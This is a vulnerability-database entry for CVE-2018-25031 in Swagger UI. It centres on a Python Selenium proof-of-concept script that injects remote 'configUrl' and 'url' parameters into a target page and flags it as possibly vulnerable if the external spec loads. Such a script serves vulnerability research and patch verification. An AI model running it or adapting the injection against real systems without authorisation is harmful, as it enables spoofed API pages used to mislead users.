Lucene search

K

Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information Exploit

🗓️ 20 Apr 2023 00:00:00Reported by Rafael Cintra LopesType 
zdt
 zdt
🔗 0day.today👁 417 Views

Swagger UI 4.1.3 - User Interface Misrepresentation exploit with Seleniu

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
Swagger UI 4.1.3 Critical Information Misrepresentation
20 Apr 202300:00
packetstorm
IBM Security Bulletins
Security Bulletin: Swagger-ui as used by IBM QRadar Advisor With Watson App is vulnerable to spoofing attacks (CVE-2018-25031)
15 Feb 202313:45
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Springfox swagger affect IBM Rational ClearQuest
29 Sep 202317:27
ibm
IBM Security Bulletins
Security Bulletin: A security vulnerability has been identified in SwaggerUI shipped with IBM Tivoli Netcool Impact (CVE-2018-25031, 221508)
6 Jul 202205:21
ibm
IBM Security Bulletins
Security Bulletin: Open Source Dependency Vulnerability
15 May 202317:52
ibm
IBM Security Bulletins
Security Bulletin: Liberty for Java for IBM Cloud is vulnerable to spoofing attacks and clickjacking due to swagger-ui (CVE-2018-25031, CVE-2021-46708)
7 Oct 202216:01
ibm
IBM Security Bulletins
Security Bulletin: IBM WebSphere Application Server Liberty, which is bundled in IBM Cloud Pak for Applications, is vulnerable to spoofing attacks and clickjacking due to swagger-ui (CVE-2018-25031, CVE-2021-46708)
19 Apr 202220:38
ibm
IBM Security Bulletins
Security Bulletin: IBM WebSphere Application Server Liberty for IBM i is vulnerable to spoofing and clickjacking attacks due to swagger-ui (CVE-2018-25031, CVE-2021-46708)
8 Apr 202215:41
ibm
IBM Security Bulletins
Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server Liberty shipped with IBM Tivoli Netcool Impact (CVE-2018-25031, CVE-2021-46708)
28 Jul 202206:16
ibm
IBM Security Bulletins
Security Bulletin: Rational Asset Analyzer is affected by two WebSphere Application Server vulnerabilities (CVE-2018-25031, CVE-2021-46708)
5 May 202216:56
ibm
Rows per page
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/

# Usage: python swagger-exploit.py https://[swagger-page].com

from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys

if __name__ == "__main__":

	target = sys.argv[1]

	desired_capabilities = DesiredCapabilities.CHROME
	desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}

	options = webdriver.ChromeOptions()
	options.add_argument("--headless")
	options.add_argument("--ignore-certificate-errors")
	options.add_argument("--log-level=3")
	options.add_experimental_option("excludeSwitches", ["enable-logging"])

	# Browser webdriver path
	drive_service = Service("C:/chromedriver.exe")

	driver = webdriver.Chrome(service=drive_service,
							options=options,
							desired_capabilities=desired_capabilities)

	driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
	time.sleep(10)
	driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
	time.sleep(10)

	logs = driver.get_log("performance")

	with open("log_file.json", "w", encoding="utf-8") as f:
		f.write("[")

		for log in logs:
			log_file = json.loads(log["message"])["message"]

			if("Network.response" in log_file["method"]
					or "Network.request" in log_file["method"]
					or "Network.webSocket" in log_file["method"]):

				f.write(json.dumps(log_file)+",")
		f.write("{}]")

	driver.quit()

	json_file_path = "log_file.json"
	with open(json_file_path, "r", encoding="utf-8") as f:
		logs = json.loads(f.read())

	for log in logs:
		try:
			url = log["params"]["request"]["url"]

			if(url == "https://petstore.swagger.io/v2/hacked1.json"):
				print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
			
			if(url == "https://petstore.swagger.io/v2/hacked2.json"):
				print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")

		except Exception as e:
			pass

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Apr 2023 00:00Current
5.9Medium risk
Vulners AI Score5.9
EPSS0.004
417
.json
Report